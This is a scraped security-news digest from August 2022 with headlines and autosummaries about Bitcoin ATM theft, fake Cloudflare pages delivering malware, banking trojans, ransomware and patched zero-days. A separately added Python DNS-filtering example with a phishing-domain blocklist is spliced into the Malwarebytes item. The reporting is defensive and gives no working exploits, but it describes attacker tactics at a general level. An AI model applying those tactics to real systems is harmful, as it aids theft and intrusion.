                Threat actors have exploited a zero-day vulnerability in the General Bytes Bitcoin ATM servers to steal BTC from multiple customers. Threat actors have exploited a zero-day flaw in General Bytes Bitcoin ATM servers that allowed them to hijack transactions associated with deposits and withdrawal of funds. GENERAL BYTES is the world’s largest Bitcoin, Blockchain, and […]

                The post Threat actors are stealing funds from General Bytes Bitcoin ATM appeared first on Security Affairs.

                Autosummary: The attackers exploited the issue to create an admin user account via the CAS admin panel. “The attacker was able to create an admin user remotely via CAS administrative interface via a URL call on the page that is used for the default installation on the server and creating the first administration user.”


                Fake DDoS protection pages on compromised WordPress sites lead to malware infections

                exploits
                2022-08-21 https://securityaffairs.co/wordpress/134686/hacking/fake-ddos-protection-pages-wordpress.html

                Threat actors compromise WordPress sites to display fake Cloudflare DDoS protection pages to distribute malware. DDoS Protection pages are associated with browser checks performed by WAF/CDN services which verify if the site visitor is a human or a bot. Recently security experts from Sucuri, spotted JavaScript injections targeting WordPress sites to display fake DDoS Protection pages […]

                The post Fake DDoS protection pages on compromised WordPress sites lead to malware infections appeared first on Security Affairs.

                Autosummary: Website owners are recommended to: keep all software on your website up to date; use strong passwords; use 2FA on your administrative panel; place your website behind a firewall service. The recommendations for regular website visitors are: make sure your computer is running a robust antivirus program; place 2FA on all important logins (such as your bank, social media).


                New Grandoreiro Banking Malware Campaign Targeting Spanish Manufacturers

                financial exploits industry
                2022-08-20 https://thehackernews.com/2022/08/new-grandoreiro-banking-malware.html
                Organizations in the Spanish-speaking nations of Mexico and Spain are in the crosshairs of a new campaign designed to deliver the Grandoreiro banking trojan. "In this campaign, the threat actors impersonate government officials from the Attorney General's Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute "


                Become a Cybersecurity Expert with 18 New Online Courses @ 98% OFF

                ciber
                2022-08-20 https://thehackernews.com/2022/08/become-cybersecurity-expert-with-18-new.html
                With more data stored in the cloud than ever before, now is a good time to get into cybersecurity. Many top corporations are looking for new talent, and even junior professionals can earn $80,000 or more. The only barrier to entry is education. How do you learn about security protocols and white hat hacking? Enter the All-In-One 2022 Super-Sized Ethical Hacking Bundle. This collection of 18

                Autosummary: The line-up covers ethical hacking with Python 3, NMAP, OWASP ZAP, Burp Suite, and other top tools.


                CISA Adds 7 New Actively Exploited Vulnerabilities to Catalog

                exploits
                2022-08-20 https://thehackernews.com/2022/08/cisa-adds-7-new-actively-exploited.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday moved to add a critical SAP security flaw to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The issue in question is CVE-2022-22536, which has received the highest possible risk score of 10.0 on the CVSS vulnerability scoring system and was addressed by SAP as part of its Patch


                CISA added 7 new flaws to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-08-20 https://securityaffairs.co/wordpress/134633/hacking/cisa-7-news-flaws.html

                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 7 new flaws to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added seven new flaws to its Known Exploited Vulnerabilities Catalog, including a critical SAP security vulnerability tracked as CVE-2022-22536. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday […]

                The post CISA added 7 new flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                Autosummary: CISA also added the following issues to the Catalog: CVE-2022-32893 – Apple iOS and macOS contain an out-of-bounds write vulnerability that could allow for remote code execution when processing malicious crafted web content.


                Hackers steal crypto from Bitcoin ATMs by exploiting zero-day bug

                financial exploits
                2022-08-20 https://www.bleepingcomputer.com/news/security/hackers-steal-crypto-from-bitcoin-atms-by-exploiting-zero-day-bug/
                Hackers have exploited a zero-day vulnerability in General Bytes Bitcoin ATM servers to steal cryptocurrency from customers. [...]

                Autosummary: The threat actors then exploited the bug to add a default admin user named "gb" to the CAS and modified the "buy" and "sell" crypto settings and "invalid payment address" to use a cryptocurrency wallet under the hacker's control.


                WordPress sites hacked with fake Cloudflare DDoS alerts pushing malware

                exploits
                2022-08-20 https://www.bleepingcomputer.com/news/security/wordpress-sites-hacked-with-fake-cloudflare-ddos-alerts-pushing-malware/
                WordPress sites are being hacked to display fake Cloudflare DDoS protection pages to distribute malware that installs the NetSupport RAT and the RaccoonStealer password-stealing Trojan. [...]

                Autosummary: Raccoon 2.0 targets passwords, cookies, auto-fill data, and credit cards saved on web browsers, a wide range of cryptocurrency wallets, and it's also capable of performing file exfiltration and taking screenshots of the victim's desktop.


                Tenacity platform enhancements provide visibility into entire AWS and Azure cloud infrastructure

                government
                2022-08-19 https://www.helpnetsecurity.com/2022/08/19/tenacity-cloud-platform/

                Tenacity Cloud launched agentless, automated and self-directed activation capability with immediate deployment within its platform. Within seconds and just a few clicks, mid-market and enterprise IT organizations can set up an account and integrate their environment with AWS. Within minutes, asset data populates and users begin to uncover misconfigurations, cost overruns and compliance issues created by errors at the configuration level. Tenacity’s platform gives users immediate and total visibility into their entire AWS and Azure … More

                The post Tenacity platform enhancements provide visibility into entire AWS and Azure cloud infrastructure appeared first on Help Net Security.

                Autosummary: “Our mission is to create the fastest and easiest way to reach cloud security, and we’re proud to be delivering unprecedented agility and speed to observability through an easy-to-use and cost-effective platform.”


                Exploiting stolen session cookies to bypass multi-factor authentication (MFA)

                exploits
                2022-08-19 https://www.helpnetsecurity.com/2022/08/19/exploiting-stolen-session-cookies-bypass-mfa/

                Active adversaries are increasingly exploiting stolen session cookies to bypass multi-factor authentication (MFA) and gain access to corporate resources, according to Sophos. In some cases, the cookie theft itself is a highly targeted attack, with adversaries scraping cookie data from compromised systems within a network and using legitimate executables to disguise the malicious activity. Once the attackers obtain access to corporate web-based and cloud resources using the cookies, they can use them for further exploitation … More

                The post Exploiting stolen session cookies to bypass multi-factor authentication (MFA) appeared first on Help Net Security.

                Autosummary: “For example, services can shorten the lifespan of cookies, but that means users must re-authenticate more often, and, as attackers turn to legitimate applications to scrape cookies, companies need to combine malware detection with behavioral analysis.”


                Cybercriminals are using bots to deploy DDoS attacks on gambling sites

                ciber
                2022-08-19 https://www.helpnetsecurity.com/2022/08/19/gambling-sites-ddos-attacks/

                Imperva releases data showing that 25% of all gambling sites were hit with DDoS attacks executed by botnets in June. As the Wimbledon tennis tournament began at the end of June, DDoS attacks increased and impacted 10% of gambling sites. This continues a damaging pattern for the industry with 40% of gambling sites suffering attacks in the last 12 months, 80% of whom were hit multiple times. Overall, the number of application layer DDoS attacks … More

                The post Cybercriminals are using bots to deploy DDoS attacks on gambling sites appeared first on Help Net Security.

                Autosummary: “For gambling firms, even an hour of downtime can equate to significant amounts of lost revenue,” says Yuriy Arbitman, Data Scientist, Imperva.


                New Amazon Ring Vulnerability Could Have Exposed All Your Camera Recordings

                exploits
                2022-08-19 https://thehackernews.com/2022/08/new-amazon-ring-vulnerability-could.html
                Retail giant Amazon patched a high-severity security issue in its Ring app for Android in May that could have enabled a rogue application installed on a user's device to access sensitive information and camera recordings. The Ring app for Android has over 10 million downloads and enables users to monitor video feeds from smart home devices such as video doorbells, security cameras, and alarm


                Cisco fixes High-Severity bug in Secure Web Appliance

                exploits
                2022-08-19 https://securityaffairs.co/wordpress/134580/security/cisco-secure-web-appliance-flaw.html

                Cisco addressed a high-severity escalation of privilege vulnerability (CVE-2022-20871) in AsyncOS for Cisco Secure Web Appliance. Cisco Secure Web Appliance (formerly Secure Web Appliance (WSA)) offers protection from malware and web-based attacks and provides application visibility and control. Cisco has addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2022-20871, that resides in the web management interface of AsyncOS for Cisco Secure Web […]

                The post Cisco fixes High-Severity bug in Secure Web Appliance appeared first on Security Affairs.

                Autosummary: “A vulnerability in the web management interface of Cisco AsyncOS for Cisco Secure Web Appliance, formerly Cisco Web Security Appliance (WSA), could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root.”


                Estonia blocked cyberattacks claimed by Pro-Russia Killnet group

                ciber
                2022-08-19 https://securityaffairs.co/wordpress/134560/cyber-warfare-2/estonia-blocked-cyberattacks-killnet.html

                Estonia announced that it has blocked a wave of cyber attacks conducted by Russian hackers against local institutions. Undersecretary for Digital Transformation Luukas Ilves announced that Estonia was hit by the most extensive wave of DDoS attacks it has faced since 2007. The DDoS attacks targeted both public institutions and the private sector. The Pro-Russia hacker […]

                The post Estonia blocked cyberattacks claimed by Pro-Russia Killnet group appeared first on Security Affairs.

                Autosummary: E-services created under this initiative include i-Voting, e-Tax Board, e-Business, e-Banking, e-Ticket, e-School, University via internet, the E-Governance Academy, as well as the release of several mobile applications.


                CISA adds 7 vulnerabilities to list of bugs exploited by hackers

                exploits
                2022-08-19 https://www.bleepingcomputer.com/news/security/cisa-adds-7-vulnerabilities-to-list-of-bugs-exploited-by-hackers/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added seven vulnerabilities to its list of bugs actively exploited by hackers, with the new flaws disclosed by Apple, Microsoft, SAP, and Google. [...]

                Autosummary: The seven additions, by CVE number and vulnerability title:
                CVE-2017-15944 – Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
                CVE-2022-21971 – Microsoft Windows Runtime Remote Code Execution Vulnerability
                CVE-2022-26923 – Microsoft Active Directory Domain Services Privilege Escalation Vulnerability
                CVE-2022-2856 – Google Chrome Intents Insufficient Input Validation Vulnerability
                CVE-2022-32893 – Apple iOS and macOS Out-of-Bounds Write Vulnerability
                CVE-2022-32894 – Apple iOS and macOS Out-of-Bounds Write Vulnerability
                CVE-2022-22536 – SAP Multiple Products HTTP Request Smuggling Vulnerability
                "If an intent contains any extras or a data URI and it targets another browser, Google Chrome would open that browser with that URL without prompting: https://t.co/iiDhLShhJv" — Hossein Lotfi (@hosselot), August 18, 2022. Microsoft fixed the CVE-2022-21971 remote code execution vulnerability in the February 2022 Patch Tuesday, but no details are available about how it is being exploited in the wild.


                DoNot Team Hackers Updated its Malware Toolkit with Improved Capabilities

                exploits
                2022-08-19 https://thehackernews.com/2022/08/donot-team-hackers-updated-its-malware.html
                The Donot Team threat actor has updated its Jaca Windows malware toolkit with improved capabilities, including a revamped stealer module designed to plunder information from Google Chrome and Mozilla Firefox browsers. The improvements also include a new infection chain that incorporates previously undocumented components to the modular framework, Morphisec researchers Hido Cohen and Arnold "

                Autosummary: Also known as APT-C-35 and Viceroy Tiger, the Donot Team is known for setting its sights on defense, diplomatic, government, and military entities in India, Pakistan, Sri Lanka, and Bangladesh, among others at least since 2016. "


                iPhone Users Urged to Update to Patch 2 Zero-Days

                exploits
                2022-08-19 https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/
                Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack. "

                Autosummary: The news of yet more vulnerabilities from top tech vendors being barraged by threat actors demonstrates that despite the best efforts from top-tier tech companies to address perennial security issues in their software, it remains an uphill battle, noted Andrew Whaley, senior technical director at Promon, a Norwegian app security company. "


                CISA added SAP flaw to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-08-19 https://securityaffairs.co/wordpress/134603/security/cisa-sap-known-exploited-vulnerabilities-catalog.html

                US CISA added a critical SAP flaw to its Known Exploited Vulnerabilities Catalog after its details were disclosed at the Black Hat and Def Con conferences. The US Cybersecurity and Infrastructure Security Agency (CISA) added a critical SAP vulnerability, tracked as CVE-2022-22536, to its Known Exploited Vulnerabilities Catalog a few days after researchers shared details […]

                The post CISA added SAP flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: In February, security researchers from Onapsis, in coordination with SAP, published a Threat Report that provides technical details about three critical vulnerabilities (CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533) that affected Internet Communication Manager (ICM), which is a core component of SAP business applications. "


                Grandoreiro banking malware targets manufacturers in Spain, Mexico

                financial exploits latam industry
                2022-08-19 https://www.bleepingcomputer.com/news/security/grandoreiro-banking-malware-targets-manufacturers-in-spain-mexico/
                The notorious "Grandoreiro" banking trojan was spotted in recent attacks targeting employees of a chemicals manufacturer in Spain and workers of automotive and machinery makers in Mexico. [...] "

                Autosummary: The backdoor capabilities of the malware on the host include:
                Keylogging
                Auto-updating to newer versions and modules
                Web injects and restricting access to specific websites
                Command execution
                Manipulating windows
                Guiding the victim's browser to a specific URL
                C2 domain generation via DGA (Domain Generation Algorithm)
                Imitating mouse and keyboard movements
                Outlook: The recent campaign indicates that Grandoreiro's operators are interested in conducting highly targeted attacks instead of sending large volumes of spam emails to random recipients. "


                The Week in Ransomware - August 19th 2022 - Evolving extortion tactics

                exploits ransomware industry
                2022-08-19 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-19th-2022-evolving-extortion-tactics/
                Bringing you the latest ransomware news, including new research, tactics, and cyberattacks. We also saw the return of the BlackByte ransomware operation, which has started to use new extortion tactics. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @LawrenceAbrams, @PolarToffee, @BleepinComputer, @Seifreed, @jorntvdw, @fwosar, @serghei, @struppigel, @FourOctets, @demonslay335, @malwrhunterteam, @Ionut_Ilascu, @malwareforme, @VK_Intel, @DanielGallagher, @juanbrodersen, @AlvieriD, @Cyberknow20, @Intel_by_KELA, @MauroEldritch, @luisezegarra, @Cleafy, and @pcrisk. "


                Tech support scammers target Microsoft users with fake Office 365 USB sticks

                financial
                2022-08-19 https://www.malwarebytes.com/blog/news/2022/08/tech-support-scammers-target-microsoft-users-with-fake-office-365-usb-sticks

                Categories: News

                Tags: Microsoft

                Tags: USB stick

                Tags: tech support scam

                Tags: scammers

                Tags: Office 365

                Tags: fake

                Tags: phone call

                We take a look at a Microsoft warning related to tech support scammers sending out bogus USB sticks in the mail.

                (Read more...)

                The post Tech support scammers target Microsoft users with fake Office 365 USB sticks appeared first on Malwarebytes Labs.

                "

                Autosummary: In this particular instance, the fake Microsoft outfit went with the “You have a virus, call us” approach. Whether a stranger has given it to you in the street as part of a giveaway, or you found it on the floor, or even received it at an event, there’s an element of risk involved. "


                Redpoint Cybersecurity names David Duncan as VP of Cyber Operations

                ciber
                2022-08-19 https://www.helpnetsecurity.com/2022/08/20/redpoint-cybersecurity-david-duncan/

                Redpoint Cybersecurity has named David Duncan as its new Vice President of Cyber Operations. As leader of the Cyber Operations team, David will have oversight over the Breach Response group as well as the Redpoint Labs team. Redpoint’s Breach Response has handled the most complex and extensive ransomware and other breaches, and the Redpoint Labs group houses Redpoint’s Threat Mitigation Group as well as its DevOps team. Prior to his newly expanded role, David was … More

                The post Redpoint Cybersecurity names David Duncan as VP of Cyber Operations appeared first on Help Net Security.

                "

                Autosummary: "


                IoT: The huge cybersecurity blind spot that’s costing millions

                industry ciber
                2022-08-18 https://www.helpnetsecurity.com/2022/08/18/iot-cybersecurity-blind-spots/

                In many ways, IoT has made our lives easier. We are technologically connected in ways we never thought possible. But organizations need to be aware of the cybersecurity blind spots generated by the prevalence of IoT technology, because connected devices are opening virtual doors into organizations’ networks. The enterprise IoT cybersecurity blind spots According to Forrester, over 60% of enterprise cyberattacks originate from the trust organizations place in their partner or vendor, and vulnerable devices … More

                The post IoT: The huge cybersecurity blind spot that’s costing millions appeared first on Help Net Security.

                "

                Autosummary: The enterprise IoT cybersecurity blind spots According to Forrester, over 60% of enterprise cyberattacks originate from the trust organizations place in their partner or vendor, and vulnerable devices ending up in the end-product or system ecosystem – which is where the blind spot comes in. As an industry-recognized seal of approval, vendors and partners can be sure that the products they are working with meet the high standards they need, and create a strong, trusting relationship between them. "


                Why smart factories need to prioritize cybersecurity

                ciber
                2022-08-18 https://www.helpnetsecurity.com/2022/08/18/why-smart-factories-need-to-prioritize-cybersecurity-video/

                Recent Capgemini research revealed that the vast majority of organizations do not have device visibility at their smart factory locations. The use of legacy machinery, designed before cybersecurity was a key element, has opened networks to attack. In this Help Net Security video, Aarthi Krishna, Global Head of Intelligent Industry Security at Capgemini, provides an overview of the cybersecurity issues smart factories have to deal with, and offers steps to help organizations better prepare, prevent … More

                The post Why smart factories need to prioritize cybersecurity appeared first on Help Net Security.

                "

                Autosummary: "


                How government CISOs tackle digital transformation initiatives

                government
                2022-08-18 https://www.helpnetsecurity.com/2022/08/18/government-digital-transformation/

                In this interview for Help Net Security, Dan Tucker, Senior VP at Booz Allen, and leader of the firm’s cloud and data engineering solutions for citizen services, talks about government digital transformation efforts, security challenges, and offers tips for CISOs. What are the most significant security challenges governments face when going through digital transformation? With respect to security, one of the most prevalent challenges for federal government agencies is striking the right balance between the … More

                The post How government CISOs tackle digital transformation initiatives appeared first on Help Net Security.

                "

                Autosummary: Similar to any complex organizational shift, the chance of success rises and falls less with technology, and more so with the foundational components of early stakeholder buy-in, well understood objectives, clear roles and responsibilities, timely and data-centric communications, and continuous feedback and learning. "


                Raytheon launches secure watch and data service for government and military employees

                government
                2022-08-18 https://www.helpnetsecurity.com/2022/08/18/raytheon-ngt-watch-nexgen-global-sim/

                Raytheon Blackbird Technologies has released NexGenTrac, or NGT, Watch and NexGen Global SIM, a wearable device and global data service that provides situational awareness and secure communications. “For government, military and other organizations that need to meet safety protocols for their globally deployed workforce, NexGenTrac Watch provides global situational awareness, secure communications and personnel accountability in the convenience of a wearable device,” said Troy Smith, director of Raytheon Blackbird Technologies. NGT Watch uses the proprietary global … More

                The post Raytheon launches secure watch and data service for government and military employees appeared first on Help Net Security.

                "

                Autosummary: “For government, military and other organizations that need to meet safety protocols for their globally deployed workforce, NexGenTrac Watch provides global situational awareness, secure communications and personnel accountability in the convenience of a wearable device,” said Troy Smith, director of Raytheon Blackbird Technologies. "


                Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities

                exploits
                2022-08-18 https://thehackernews.com/2022/08/apple-releases-security-updates-to.html
                Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices. The list of issues is below - CVE-2022-32893 - An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content CVE-2022-32894 - An "

                Autosummary: "


                Apple fixes exploited zero-days: Update your devices! (CVE-2022-32894, CVE-2022-32893)

                exploits
                2022-08-18 https://www.helpnetsecurity.com/2022/08/18/cve-2022-32894-cve-2022-32893-cve-2022-2856/

                Apple has released security updates for iOS, iPadOS, and macOS Monterey to fix CVE-2022-32894 and CVE-2022-32893, two code execution vulnerabilities exploited by attackers in the wild. About the vulnerabilities (CVE-2022-32894, CVE-2022-32893) CVE-2022-32894 is an out-of-bounds write issue in the operating systems’ kernel that can be exploited by a malicious application to execute arbitrary code with kernel privileges (and take control over the entire system). CVE-2022-32893 is an out-of-bounds write issue in WebKit – Apple’s browser engine that … More

                The post Apple fixes exploited zero-days: Update your devices! (CVE-2022-32894, CVE-2022-32893) appeared first on Help Net Security.

                "

                Autosummary: "


                Apple fixed two new zero-day flaws exploited by threat actors

                exploits
                2022-08-18 https://securityaffairs.co/wordpress/134527/security/apple-zero-day-flaws-2.html

                Apple addressed two zero-day vulnerabilities, exploited by threat actors, affecting iOS, iPadOS, and macOS devices. Apple this week released security updates for iOS, iPadOS, and macOS platforms to address two zero-day vulnerabilities exploited by threat actors. Apple did not share details about these attacks. The two flaws are: CVE-2022-32893 – An out-of-bounds issue in WebKit which. An attacker can trigger the […]

                The post Apple fixed two new zero-day flaws exploited by threat actors appeared first on Security Affairs.

                "

                Autosummary: "


                PoC exploit code for critical Realtek RCE flaw released online

                exploits
                2022-08-18 https://securityaffairs.co/wordpress/134515/breaking-news/realtek-rce-poc-exploit.html

                Exploit code for a critical vulnerability affecting networking devices using Realtek RTL819x system on a chip was released online. The PoC exploit code for a critical stack-based buffer overflow issue, tracked as CVE-2022-27255 (CVSS 9.8), affecting networking devices using Realtek’s RTL819x system on a chip was released online. The issue resides in Realtek’s SDK for […]

                The post PoC exploit code for critical Realtek RCE flaw released online appeared first on Security Affairs.

                "

                Autosummary: "


                Vulnerability in Amazon Ring app allowed access to private camera recordings

                exploits
                2022-08-18 https://www.helpnetsecurity.com/2022/08/18/vulnerability-amazon-ring-app/

                A vulnerability in the Android version of the Ring app, which is used to remotely manage Amazon Ring outdoor (video doorbell) and indoor surveillance cameras, could have been exploited by attackers to extract users’ personal data and device’s data, including geolocation, address, and recordings. The vulnerability was discovered by Checkmarx researchers, who went one step further and demonstrated how an attacker could later analyze huge numbers of recordings with the help of computer vision technology, … More

                The post Vulnerability in Amazon Ring app allowed access to private camera recordings appeared first on Help Net Security.

                "

                Autosummary: "


                Penetration Testing or Vulnerability Scanning? What's the Difference?

                exploits
                2022-08-18 https://thehackernews.com/2022/08/penetration-testing-or-vulnerability.html
                Pentesting and vulnerability scanning are often confused for the same service. The problem is, business owners often use one when they really need the other. Let's dive in and explain the differences. People frequently confuse penetration testing and vulnerability scanning, and it's easy to see why. Both look for weaknesses in your IT infrastructure by exploring your systems in the same way an "

                Autosummary: Around the clock coverage While some companies still use annual pentesting as their only line of defence, many are starting to see how frequently new threats arise and the value of continuous, automated threat scanning. It's a hands-on, in-depth test to evaluate security controls across a variety of systems, including web application, network and cloud environments. "


                Janet Jackson's music video is now a vulnerability for crashing hard disks

                exploits
                2022-08-18 https://www.bleepingcomputer.com/news/security/janet-jacksons-music-video-is-now-a-vulnerability-for-crashing-hard-disks/
                Janet Jackson's Rhythm Nation music video of 1989 has officially been declared a security vulnerability as it freezes some models of hard drives on older computers. [...] "

                Autosummary: Chen reflects that investigators discovered something even weirder: "Playing the music video on one laptop caused a laptop sitting nearby to crash, even though that other laptop wasn't playing the video!" "It turns out that the song contained one of the natural resonant frequencies for the model of 5400 rpm laptop hard drives that they and other manufacturers used. "


                Researchers Detail Evasive DarkTortilla Crypter Used to Deliver Malware

                exploits
                2022-08-18 https://thehackernews.com/2022/08/researchers-detail-evasive-darktortilla.html
                A .NET-based evasive crypter named DarkTortilla has been used by threat actors to distribute a broad array of commodity malware as well as targeted payloads like Cobalt Strike and Metasploit, likely since 2015. "It can also deliver "add-on packages" such as additional malicious payloads, benign decoy documents, and executables," cybersecurity firm Secureworks said in a Wednesday report. "It "

                Autosummary: "It can also deliver "add-on packages" such as additional malicious payloads, benign decoy documents, and executables," cybersecurity firm Secureworks said in a Wednesday report. "


                Google Patches Chrome’s Fifth Zero-Day of the Year

                exploits
                2022-08-18 https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/
                An insufficient input validation flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack. "

                Autosummary: In July, the company fixed an actively exploited heap buffer overflow flaw tracked as CVE-2022-2294 in WebRTC, the engine that gives Chrome its real-time communications capability, while earlier in the year a separate, also actively exploited, flaw got slapped with a patch. "


                BlackByte ransomware v2 is out with new extortion novelties

                exploits ransomware
                2022-08-18 https://securityaffairs.co/wordpress/134531/cyber-crime/blackbyte-ransomware-v2.html

                A new version of the BlackByte ransomware appeared in the threat landscape; version 2.0 uses extortion techniques similar to LockBit’s. BlackByte ransomware version 2.0 appeared in the threat landscape after a short break, and the latest version has a new data leak site. It is interesting to note that the group introduced some novelties in the […]

                The post BlackByte ransomware v2 is out with new extortion novelties appeared first on Security Affairs.

                "

                Autosummary: "


                Apple releases Safari 15.6.1 to fix zero-day bug used in attacks

                exploits
                2022-08-18 https://www.bleepingcomputer.com/news/security/apple-releases-safari-1561-to-fix-zero-day-bug-used-in-attacks/
                Apple has released Safari 15.6.1 for macOS Big Sur and Catalina to fix a zero-day vulnerability exploited in the wild to hack Macs. [...] "

                Autosummary: "


                Android malware apps with 2 million installs found on Google Play

                exploits
                2022-08-18 https://www.bleepingcomputer.com/news/security/android-malware-apps-with-2-million-installs-found-on-google-play/
                A new batch of thirty-five Android malware apps that display unwanted advertisements was found on the Google Play Store, with the apps installed over 2 million times on victims' mobile devices. [...] "

                Autosummary: The most popular of these, having 100k downloads each, are the following:
                Walls light – Wallpapers Pack (gb.packlivewalls.fournatewren)
                Big Emoji – Keyboard 5.0 (gb.blindthirty.funkeyfour)
                Grand Wallpapers – 3D Backdrops 2.0 (gb.convenientsoftfiftyreal.threeborder)
                Engine Wallpapers (gb.helectronsoftforty.comlivefour)
                Stock Wallpapers (gb.fiftysubstantiated.wallsfour)
                EffectMania – Photo Editor 2.0 (gb.actualfifty.sevenelegantvideo)
                Art Filter – Deep Photoeffect 2.0 (gb.crediblefifty.editconvincingeight)
                Fast Emoji Keyboard APK (de.eightylamocenko.editioneights)
                Create Sticker for Whatsapp 2.0 (gb.convincingmomentumeightyverified.realgamequicksix)
                Math Solver – Camera Helper 2.0 (gb.labcamerathirty.mathcamera) "


                LockBit claims ransomware attack on security giant Entrust

                exploits ransomware
                2022-08-18 https://www.bleepingcomputer.com/news/security/lockbit-claims-ransomware-attack-on-security-giant-entrust/
                The LockBit ransomware gang has claimed responsibility for the June cyberattack on digital security giant Entrust. [...] "

                Autosummary: "


                Business Services industry targeted across the country for backdoor access

                government industry
                2022-08-18 https://www.malwarebytes.com/blog/threat-intelligence/2022/08/business-services-targeted-across-the-country-for-backdoor-access

                Categories: Threat Intelligence

                High detections of hacking tools for the Business Services industry shows that attackers likely sought to infect businesses and install backdoors for future access to their customers.

                (Read more...)

                The post Business Services industry targeted across the country for backdoor access appeared first on Malwarebytes Labs.

                "

                Autosummary: A subsequent spike of this threat in August 2021 coincides with three major attacks, likely achieved because of the success of CVE-2021-21551. These were the Kaseya breach which spread REvil to hundreds of networks, the ransomware attack on consulting firm Accenture, which demanded $50 million in payment, and the T-Mobile data breach which exposed the information of 50 million people. "


                Attackers waited until holidays to hit US government

                government
                2022-08-18 https://www.malwarebytes.com/blog/threat-intelligence/2022/08/government-attacks-wait-until-the-holidays-to-strike

                Categories: Threat Intelligence

                In the first quarter of 2021, the US public sector dealt with heavy-hitting breaches against local, federal, and state government networks.

                (Read more...)

                The post Attackers waited until holidays to hit US government appeared first on Malwarebytes Labs.

                "

                Autosummary: Despite that, a series of unspecified exploits battered the industry in late October, spiking in November and into December, when the Maryland Department of Health, the Virginia State Government and the Hawaii Timekeeping Services were all breached and disrupted, some due to ransomware, others to stolen data. So, knowing the trends of attacks on government organizations, we recommend not reducing security staff during the holidays; if anything, you need to have more eyes on the network, looking for anything that might stand out as odd when the network is meant to be relatively quiet. "


                How IT teams can prevent phishing attacks with Malwarebytes DNS filtering

                financial exploits
                2022-08-18 https://www.malwarebytes.com/blog/business/2022/08/how-it-teams-can-prevent-phishing-attacks-with-malwarebytes-dns-filtering

                Categories: Business

                According to Verizon, 82 percent of data breaches in 2021 involved the human element—with phishing attacks making up over 60 percent of these. But Malwarebytes DNS filtering can help you prevent a large swath of phishing attacks.

                (Read more...)

                The post How IT teams can prevent phishing attacks with Malwarebytes DNS filtering appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: August 18, 2022. According to Verizon, 82 percent of data breaches in 2021 involved the human element—with phishing attacks making up over 60 percent of these. And if it ain’t broke, don’t fix it: threat actors have only continued to use phishing to attack businesses in 2022, with the Anti-Phishing Working Group (APWG) recording a 15 percent increase in phishing attacks in Q1 2022 compared to Q4 2021. "
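The technique behind any DNS filter is the same whatever the vendor: the resolver compares each queried name against a blocklist before answering, so a phishing link fails to resolve even if the user clicks it. The following is an added example (not Malwarebytes' code) of that decision logic run over a few constructed query-log lines. The blocklist, allowlist, client addresses and the "timestamp client qtype qname" log layout are all invented for illustration and do not correspond to any particular resolver's format.

```python
"""Resolver-side DNS filtering: allow a lookup or send it to the sinkhole.

Added example, not Malwarebytes' code. Blocklist, allowlist and the
query-log lines are constructed; the log layout is invented.
"""
from collections import Counter

# Constructed blocklist: two lookalike phishing domains and one whole zone.
BLOCKLIST = {"login-micros0ft-verify.com", "secure-update-office365.net", "example.org"}
# Constructed allowlist: a host inside a blocked zone that must keep working.
ALLOWLIST = {"mail.example.org"}

# Constructed query log: "timestamp client qtype qname".
SAMPLE_LOG = """\
2022-08-18T09:12:01Z 10.0.4.17 A login-micros0ft-verify.com.
2022-08-18T09:12:03Z 10.0.4.17 AAAA Mail.Example.Org
2022-08-18T09:12:07Z 10.0.5.2 A cdn.secure-update-office365.net
2022-08-18T09:12:09Z 10.0.5.2 A www.example.com
2022-08-18T09:12:12Z 10.0.4.17 TXT evil.example.org.
"""


def normalize(qname):
    """DNS names are case-insensitive and may carry a trailing root dot."""
    return qname.strip().rstrip(".").lower()


def ancestors(name):
    """'a.b.example.org' -> ['a.b.example.org', 'b.example.org', 'example.org', 'org']"""
    labels = name.split(".")
    return [".".join(labels[i:]) for i in range(len(labels))]


def decide(qname, blocklist=BLOCKLIST, allowlist=ALLOWLIST):
    """Walk from the most specific name to the TLD; the first list hit wins.

    This makes subdomains of a listed name blocked too (so 'cdn.<phish>'
    cannot slip past a list that only names '<phish>') while an allowlisted
    host inside a blocked zone still resolves.
    """
    for candidate in ancestors(normalize(qname)):
        if candidate in allowlist:
            return "allow"
        if candidate in blocklist:
            return "block"
    return "allow"


def filter_log(log_text):
    """Apply decide() to each query line; returns (client, qname, verdict)."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, _qtype, qname = line.split()
        results.append((client, normalize(qname), decide(qname)))
    return results


def blocked_per_client(results):
    """Clients that tried to reach blocked names: the triage list for the SOC."""
    return Counter(client for client, _name, verdict in results if verdict == "block")


if __name__ == "__main__":
    verdicts = filter_log(SAMPLE_LOG)
    for client, name, verdict in verdicts:
        print(f"{client:12} {name:40} {verdict}")
    print(dict(blocked_per_client(verdicts)))
```

What the resolver returns for a blocked name (NXDOMAIN or a sinkhole address) is left to the resolver here; the point of the example is the matching rule. Case-folding and stripping the trailing dot are not cosmetic: a blocklist keyed on exact strings would let `Mail.Example.Org.` through while blocking `mail.example.org`, and the per-client count is what turns a blocked click into an incident lead.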


                Urgent update for macOS and iOS! Two actively exploited zero-days fixed

